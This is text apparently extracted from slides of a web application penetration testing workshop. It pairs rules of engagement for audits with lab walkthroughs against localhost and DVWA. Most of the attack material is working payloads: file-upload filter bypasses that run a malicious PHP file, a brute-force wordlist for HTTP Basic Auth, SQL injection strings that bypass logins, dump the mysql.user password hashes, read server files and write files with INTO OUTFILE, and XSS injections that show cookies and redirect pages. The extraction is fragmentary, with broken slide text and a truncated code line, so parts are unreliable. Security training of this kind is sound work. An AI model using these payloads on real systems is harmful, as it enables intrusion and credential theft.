Beruflich Dokumente
Kultur Dokumente
edli@scan-associates.net
We will focus on
Low Hanging Fruit concept.
PHP / Perl programming
Open Source based
Web Application Penetration Testing
Blind
The Analyst engages the target with limited knowledge of its defenses
and assets
and full knowledge of channels. The target is notified in advance of the
scope and
time frame of the audit but not the channels tested or the test vectors.
A double
gray box audit tests the skills of the Analyst and the targets
preparedness to
unknown variables of agitation. The breadth and depth depends upon
the quality of
the information provided to the Analyst and the target before the test
as well as the
Analysts applicable knowledge. This is also known as a White Box test.
Tandem
The Analyst and the target are prepared for the audit, both knowing in
advance all
the details of the audit. A tandem audit tests the protection and controls of the
target. However, it cannot test the preparedness of the target to unknown
variables
of agitation. The true nature of the test is thoroughness as the Analyst does
have full
view of all tests and their responses. The breadth and depth depends upon the
quality of the information provided to the Analyst before the test
(transparency)
as well as the Analysts applicable knowledge. This is often known as an In-
House
Audit or a Crystal Box test and the Analyst is often part of the security process
Reversal
9. Contracts should limit liability to the cost of the job, unless malicious
activity has been proven.
10. Contracts must clearly explain the limits and dangers of the
security test
as part of the statement of work.
11. In the case of remote testing, the contract must include the
origin of the
Analysts by address, telephone number or IP address.
12. The client must provide a signed statement which provides
testing
permission exempting the Analysts from trespass within the scope,
and
damages liability to the cost of the audit service with the exception
where
malicious activity has been proven.
14. The contract must include clear, specific permissions for tests
involving
survivability failures, denial of service, process testing, and social
engineering.
15. Contracts must contain the process for future contract
and statement of
work (SOW) changes.
18. The audit must clearly explain the limits of any security
tests according to
the scope.
Test Plan
19. The test plan may not contain plans, processes,
techniques, or procedures
which are outside the area of expertise or competence
level of the Analyst.
Test Process
20. The Analyst must respect and maintain the safety, health, welfare,
and
privacy of the public both within and outside the scope.
21. The Analyst must always operate within the law of the physical
location(s)
of the targets in addition to rules or laws governing the Analysts test
location.
22. To prevent temporary raises in security for the duration of the test,
only
notify key people about the testing. It is the clients judgment which d
discerns who the key people are; however, it is assumed that they will
be
information and policy gatekeepers, managers of security processes,
incident response personnel, and security operations staff..
23. If necessary for privileged testing, the client must provide two,
separate,
access tokens whether they be passwords, certificates, secure ID numbers,
badges, etc. and they should be typical to the users of the privileges being
tested rather than especially empty or secure accesses.
24. When testing includes known privileges, the Analyst must first test
without
privileges (such as in a black box environment) prior to testing again with
privileges.
25. The Analysts are required to know their tools, where the tools came
from,
how the tools work, and have them tested in a restricted test area before
using the tools on the client organization.
26. The conduct of tests which are explicitly meant to test the
denial of a
service or process or survivability may only be done with explicit
permission
and only to the scope where no damage is done outside of the
scope or
the community in which the scope resides.
30. The Analyst may not leave the scope in a position of less actual
security than it was when provided
Reporting
31. The Analyst must respect the privacy of all individuals
and maintain their
privacy for all results.
33. The Analyst may not sign test results and audit reports
in which they were
not directly involved.
34. Reports must remain objective and without untruths or any
personally
directed malice.
List View
Tree View
Tick Be recursive and change file extension to html
Interesting file was found
Unrestricted File
Upload Vulnerability
Case 1
http://localhost/upload/upload1/lampiran.html
Success!
Task 1
Objective : Brute-forcing directories with our list
1. Using DirBuster to locate our uploaded file
2. Add to your file mylist.txt of these directories :
uplodfile
uploadfail
file
uplot
tempatfail
tempatrujukanpersuratan
Review our code!
Case 2
http://localhost/upload/upload2/lampiran.html
Cannot upload the file
We will use Tamper Data technique. What we
need is:
Or
To use it:
Set web browser proxy to localhost/127.0.01
Set the port to 8080
Burp Suite GUI
Make sure the Intercept is on
Change the Content-Type to image/jpeg
Click forward
Ho-Yeay!
Review our code!
Case 3
http://localhost/upload/upload3/lampiran.html
Not allowed? Then we should modify our file extension.
Well done!
Review our code!
Task 2
Objective : Upload malicious php file and execute the file with php extension
Hint : Upload a file with *no* extension. The server will read
our php file as it was an
image file.
Our code!
Brute force at HTTP Basic Authentication
Simple HTTP Authentication Bruteforcer using Perl
Create two dictionary file. Save it as user.txt and pass.txt
admin
administrator
password
passwd
123
1234
12345
root
test
By browsing the application, the attacker looks for absolute links to files
stored on
the web server. By manipulating variables that reference files with dot-
dot-slash (../)
sequences and its variations, it may be possible to access arbitrary files
and
directories stored on file system, including application source code,
configuration and
critical system files, limited by system operational access control.
The primary form of SQL injection consists of direct insertion of code into
parameters
that are concatenated with SQL commands and executed
A successful SQL injection exploit can read sensitive data from the database,
modify
database data (Insert/Update/Delete), execute administration operations on the
database (such as shutdown the DBMS), recover the content of a given file present
on the DBMS file system and in some cases issue commands to the operating
system. SQL injection attacks are a type ofinjection attack, in which SQL
commands
are injected into data-plane input in order to effect the execution of predefined SQL
commands
We will focus on SQL Injection vulnerability :
Requirement :
XAMPP server
Damn Vulnerable Web Application
Basic SQL commands
Login into DVWA (admin | password)
Inside DVWA
Input 1,2,3,4,5
Input alphabetics
Input any string with a single quote
The webpage produced SQL error
SQL Bypass Login
Try this :
1 or 1=1- -
1 or 1=1#
or 1=1- -
or 1=1#
%' or 1=1
Order By
To find the number of columns
int i =1;
For ( i=1, i
order by 1#
Increment each number until we see an error on the page
using union all select to union
' union all select 1,version(),database(),4,5,6#
MySQL cheat sheet
Description SQL command
version : version()
current user : user(),
system_user()
hostname : @@hostname
location of data : @@datadir
Try certain command which is quite interesting.
LIKE
' union all select 1,table_name,3,4,5,6 from information_schema.tables
where table_name like 'user%'#
Enumerating list of table
names using SQL command
with SQL injection technique
union all select 1,table_name,3,4,5,6 from information_schema.tables#
' union all select 1,table_schema,3,4,5,6 from information_schema.tables#
SQL function : concatenate
MySQLCONCATfunction is
used to concatenate two
strings to form a single string
' union all select 1,concat(table_schema,0x3a,table_name),3,4,5,6 from
information_schema.tables#
SQL clause : WHERE
www.md5decryptor.co.uk
Cracking tools John the Ripper
hashcat GPU based cracker
Any other alternatives for
post-exploitation?
Check database privileges
grantee
privilege_type,
is_grantable
' union all select 1,concat(grantee,0x3a,privilege_type,0x3a,is_grantable),3,4,5,6
from information_schema.user_privileges#
' union all select 1,concat(user,0x3a,password),3,4,5,6 from mysql.user#
Crack it using online crack site
Login into phpMyAdmin (if any)
Successfully login with root account
' union all select 1,load_file('C:\\xampp\\htdocs\\pentest.php'),3,4,5,6#
' union all select
1,load_file('C:\\xampp\\htdocs\\upload\\upload2\\uploadfile\\.htaccess'),3,4,5,6#
' union all select 1,load_file('C:\\xampp\\php\\php.ini'),3,4,5,6#
' union all select 1,'test',3,4,5,6 into outfile 'test.txt'#
Task 3
Create a new PHP file (test.php) using SQL syntax of INTO OUTFILE
Output : Output our file with the full path together with our
code (input)
Flaws that allow these attacks to succeed are quite widespread and occur
anywhere
a web application uses input from a user in the output it generates without
validating or encoding it.
[Reference : OWASP]
Reflected XSS Attacks
Reflected attacks are those where the injected code is reflected off the
web server,
such as in an error message, search result, or any other response that
includes some
or all of the input sent to the server as part of the request. Reflected
attacks are
delivered to victims via another route, such as in an e-mail message, or on
some
other web server. When a user is tricked into clicking on a malicious link or
submitting a specially crafted form, the injected code travels to the
vulnerable web
server, which reflects the attack back to the users browser. The browser
then
executes the code because it came from a "trusted" server.
Output on the page and source-page
Simple checks for XSS using Javascript tags <script>
Reflected XSS
Input : <script>alert(PENTEST')</script>
Reflected XSS
Input : <h1><font color="#00FF00">Alienware</font></h1>
Stored XSS Attacks
The attacker can compromise the session token by using malicious code or
programs
running at the client-side. The example shows how the attacker could use an
XSS
attack to steal the session token. If an attacker sends a crafted link to the
victim
with the malicious JavaScript, when the victim clicks on the link, the JavaScript
will
run and complete the instructions made by the attacker. The example in figure
3
uses an XSS attack to show the cookie value of the current session; using the
same
technique it's possible to create a specific JavaScript code that will send the
cookie
to the attacker.
[Reference : OWASP]
Inject using script below
Input : <script>alert(document.cookie)</script>
Inject using script below
Input : <script>document.location='http://www.google.com.my';</script>
Redirected